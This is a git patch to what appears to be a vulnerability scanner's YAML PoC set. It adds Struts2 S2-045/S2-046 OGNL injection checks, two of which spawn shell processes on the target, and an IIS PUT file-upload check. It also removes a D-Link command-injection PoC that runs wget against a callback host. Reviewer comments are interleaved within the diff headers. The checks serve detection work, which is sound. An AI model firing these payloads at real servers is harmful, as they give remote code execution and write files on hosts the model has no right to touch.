From 8664cf38337130c716e060aaeb789560e4be298f Mon Sep 17 00:00:00 2001
From: shadow1ng
Date: Sun, 28 Feb 2021 15:20:18 +0800
Subject: [PATCH] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E3=80=81=E6=B7=BB=E5=8A=A0po?=
 =?UTF-8?q?c?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 WebScan/info/rules.go | 1 +
 WebScan/pocs/dlink-cve-2019-16920-rce.yml | 19 -------------------
 WebScan/pocs/iis6.0-put.yml | 21 +++++++++++++++++++++
 WebScan/pocs/jenkins-cve-2018-1000600.yml | 13 -------------
 WebScan/pocs/struts2-045-1.yml | 15 +++++++++++++++
 WebScan/pocs/struts2-045-2.yml | 12 ++++++++++++
 WebScan/pocs/struts2-045-3.yml | 12 ++++++++++++
 WebScan/pocs/struts2-046-1.yml | 16 ++++++++++++++++
 WebScan/pocs/struts2-046-2.yml | 16 ++++++++++++++++
 9 files changed, 93 insertions(+), 32 deletions(-)
 delete mode 100644 WebScan/pocs/dlink-cve-2019-16920-rce.yml
 create mode 100644 WebScan/pocs/iis6.0-put.yml
 delete mode 100644 WebScan/pocs/jenkins-cve-2018-1000600.yml
 create mode 100644 WebScan/pocs/struts2-045-1.yml
 create mode 100644 WebScan/pocs/struts2-045-2.yml
 create mode 100644 WebScan/pocs/struts2-045-3.yml
 create mode 100644 WebScan/pocs/struts2-046-1.yml
 create mode 100644 WebScan/pocs/struts2-046-2.yml
diff --git a/WebScan/info/rules.go b/WebScan/info/rules.go
index af8bcbf..ca92c0d 100644
--- a/WebScan/info/rules.go
+++ b/WebScan/info/rules.go
@@ -63,6 +63,7 @@ var RuleDatas = []RuleData{
 {"华为 MCU", "code", "(McuR5-min.js)"},
 {"TP-LINK Wireless WDR3600", "code", "(TP-LINK Wireless WDR3600)"},
 {"泛微协同办公OA", "headers", "(ecology_JSessionid)"},
+ {"泛微协同办公OA", "code", "(/spa/portal/public/index.js)"},
 {"华为_HUAWEI_ASG2050", "code", "(HUAWEI ASG2050)"},
 {"360网站卫士", "code", "(360wzb)"},
 {"Citrix-XenServer", "code", "(Citrix Systems, Inc. XenServer)"},
diff --git a/WebScan/pocs/dlink-cve-2019-16920-rce.yml b/WebScan/pocs/dlink-cve-2019-16920-rce.yml
deleted file mode 100644
index 8df53e7..0000000
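Review bot: The new fingerprint `(/spa/portal/public/index.js)` leaves the `.` in `index.js` unescaped, so if RuleData patterns are compiled as regular expressions (the parenthesised group form suggests they are) that position matches any character and the rule is slightly looser than intended; `{"泛微协同办公OA", "code", "(/spa/portal/public/index\\.js)"},` pins it. Neighbouring entries such as `(McuR5-min.js)` share the same looseness, so this is a pre-existing convention rather than a regression introduced here. The same display name already exists one line above with a `headers` match; if the two are meant as alternative signals for one product that is fine, but if the loader keys rules by name it is worth confirming the second entry is not silently dropped. RuleDatas starts before and ends after this hunk.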
--- a/WebScan/pocs/dlink-cve-2019-16920-rce.yml
+++ /dev/null
@@ -1,19 +0,0 @@
-name: poc-yaml-dlink-cve-2019-16920-rce
-set:
- reverse: newReverse()
- reverseURL: reverse.url
-rules:
- - method: POST
- path: /apply_sec.cgi
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: >-
- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}}
- follow_redirects: true
- expression: |
- response.status == 200 && reverse.wait(5)
-detail:
- author: JingLing(https://hackfun.org/)
- links:
- - https://www.anquanke.com/post/id/187923
- - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
diff --git a/WebScan/pocs/iis6.0-put.yml b/WebScan/pocs/iis6.0-put.yml
new file mode 100644
index 0000000..de6c485
--- /dev/null
+++ b/WebScan/pocs/iis6.0-put.yml
@@ -0,0 +1,21 @@
+name: poc-yaml-iis-put-getshell
+set:
+ filename: randomLowercase(6)
+ fileContent: randomLowercase(6)
+
+rules:
+ - method: PUT
+ path: /{(unknown)}.txt
+ body: |
+ {{fileContent}}
+ expression: |
+ response.status == 201
+ - method: GET
+ path: /{(unknown)}.txt
+ follow_redirects: false
+ expression: |
+ response.status == 200 && response.body.bcontains(bytes(fileContent))
+detail:
+ author: Cannae(github.com/thunderbarca)
+ links:
+ - https://www.cnblogs.com/-mo-/p/11295400.html
\ No newline at end of file
diff --git a/WebScan/pocs/jenkins-cve-2018-1000600.yml b/WebScan/pocs/jenkins-cve-2018-1000600.yml
deleted file mode 100644
index 663f427..0000000
--- a/WebScan/pocs/jenkins-cve-2018-1000600.yml
+++ /dev/null
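Review bot: Both request paths in iis6.0-put.yml read `/{(unknown)}.txt` as rendered here, so the `filename` value declared under `set` is never referenced and the PUT and GET would go to a fixed, non-random path; if this is only a rendering artifact of `{{filename}}` disregard, otherwise both rules should read `path: /{{filename}}.txt`. The PUT also leaves the uploaded text file on the scanned host and nothing in the PoC removes it afterwards, which `detail` should state so operators know this check is not read-only, or a cleanup rule should follow the GET. The file is also missing its trailing newline (`\ No newline at end of file`), unlike the other PoCs in this commit.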
@@ -1,13 +0,0 @@
-name: poc-yaml-jenkins-cve-2018-1000600
-set:
- reverse: newReverse()
- reverseUrl: reverse.url
-rules:
- - method: GET
- path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl={{reverseUrl}}
- expression: |
- response.status == 200 && reverse.wait(5)
-detail:
- author: PickledFish(https://github.com/PickledFish)
- links:
- - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
diff --git a/WebScan/pocs/struts2-045-1.yml b/WebScan/pocs/struts2-045-1.yml
new file mode 100644
index 0000000..9259a77
--- /dev/null
+++ b/WebScan/pocs/struts2-045-1.yml
@@ -0,0 +1,15 @@
+name: poc-yaml-struts2_045-1
+set:
+ r1: randomInt(800, 1000)
+ r2: randomInt(800, 1000)
+rules:
+ - method: GET
+ path: /
+ headers:
+ Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data
+ follow_redirects: true
+ expression: |
+ response.headers["Keyvalue"].contains(string(r1 * r2))
+detail:
+ author: shadown1ng(https://github.com/shadown1ng)
+
diff --git a/WebScan/pocs/struts2-045-2.yml b/WebScan/pocs/struts2-045-2.yml
new file mode 100644
index 0000000..18769e6
--- /dev/null
+++ b/WebScan/pocs/struts2-045-2.yml
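Review bot: None of the five new struts2 PoCs carries a `links:` entry under `detail` (this file and struts2-045-2, 045-3, 046-1, 046-2), whereas the deleted dlink and jenkins PoCs and the new iis6.0-put.yml all cite a source, so a maintainer has nothing to check the payload or the affected version range against. Add a `links:` list pointing at the vendor S2-045 / S2-046 advisory, e.g. `links:` / `- <S2-045 advisory URL>`. Each of these five files also ends with an empty `+` line after `author`, which is harmless but inconsistent with the other PoCs in this commit.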
@@ -0,0 +1,12 @@
+name: poc-yaml-struts2_045-2
+rules:
+ - method: GET
+ path: /
+ headers:
+ Content-Type: "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}"
+ follow_redirects: true
+ expression: |
+ response.body.bcontains(b"struts2_security_check")
+detail:
+ author: shadown1ng(https://github.com/shadown1ng)
+
diff --git a/WebScan/pocs/struts2-045-3.yml b/WebScan/pocs/struts2-045-3.yml
new file mode 100644
index 0000000..8c6379f
--- /dev/null
+++ b/WebScan/pocs/struts2-045-3.yml
@@ -0,0 +1,12 @@
+name: poc-yaml-struts2_045-3
+rules:
+ - method: GET
+ path: /
+ headers:
+ Content-Type: "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#s=new java.util.Scanner((new java.lang.ProcessBuilder('echo struts2_security_check'.toString().split('\\\\s'))).start().getInputStream()).useDelimiter('\\\\AAAA')).(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).(#res.getWriter().close()).(#s.close())}"
+ follow_redirects: true
+ expression: |
+ response.body.bcontains(b"struts2_security_check")
+detail:
+ author: shadown1ng(https://github.com/shadown1ng)
+
diff --git a/WebScan/pocs/struts2-046-1.yml b/WebScan/pocs/struts2-046-1.yml
new file mode 100644
index 0000000..f0ec629
--- /dev/null
+++ b/WebScan/pocs/struts2-046-1.yml
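Review bot: The `Content-Type` payload in struts2-045-3.yml spawns a process on the scanned host (`new java.lang.ProcessBuilder('echo struts2_security_check'...)`) only to print the same `struts2_security_check` marker that struts2-045-2.yml already obtains by writing to the response, so the extra side effect adds no confirmation the lighter check does not already give and is the variant most likely to disturb a production target. struts2-046-2.yml stands in the same relation to struts2-046-1.yml. If the process-spawning variants are kept as fallbacks for hosts where the response-writer form fails, say so in `detail` and document the side effect there; otherwise consider dropping them, since `expression` is identical across each pair.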
@@ -0,0 +1,16 @@
+name: poc-yaml-struts2_046-1
+set:
+ r1: b"-----------------------------\r\nContent-Disposition:\x20form-data;\x20name=\"test\";\x20filename=\"%{(#_=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType(\'text/html;charset=UTF-8\')).(#res.getWriter().print(\'struts2_security_\')).(#res.getWriter().print(\'check\')).(#res.getWriter().flush()).(#res.getWriter().close())}\x00b\"\r\nContent-Type:\x20text/plain\r\n\r\n\r\n-----------------------------"
+rules:
+ - method: POST
+ path: /
+ headers:
+ Content-Type: multipart/form-data; boundary=---------------------------
+ follow_redirects: true
+ body: |
+ {{r1}}
+ expression: |
+ response.body.bcontains(b"struts2_security_check")
+detail:
+ author: shadown1ng(https://github.com/shadown1ng)
+
diff --git a/WebScan/pocs/struts2-046-2.yml b/WebScan/pocs/struts2-046-2.yml
new file mode 100644
index 0000000..81d12f3
--- /dev/null
+++ b/WebScan/pocs/struts2-046-2.yml
@@ -0,0 +1,16 @@
+name: poc-yaml-struts2_046-2
+set:
+ r1: b"-----------------------------\r\nContent-Disposition:\x20form-data;\x20name=\"test\";\x20filename=\"%{(#_=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo\x20struts2_security_check').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00b\"\r\nContent-Type:\x20text/plain\r\n\r\n\r\n-----------------------------"
+rules:
+ - method: POST
+ path: /
+ headers:
+ Content-Type: multipart/form-data; boundary=---------------------------
+ follow_redirects: true
+ body: |
+ {{r1}}
+ expression: |
+ response.body.bcontains(b"struts2_security_check")
+detail:
+ author: shadown1ng(https://github.com/shadown1ng)
+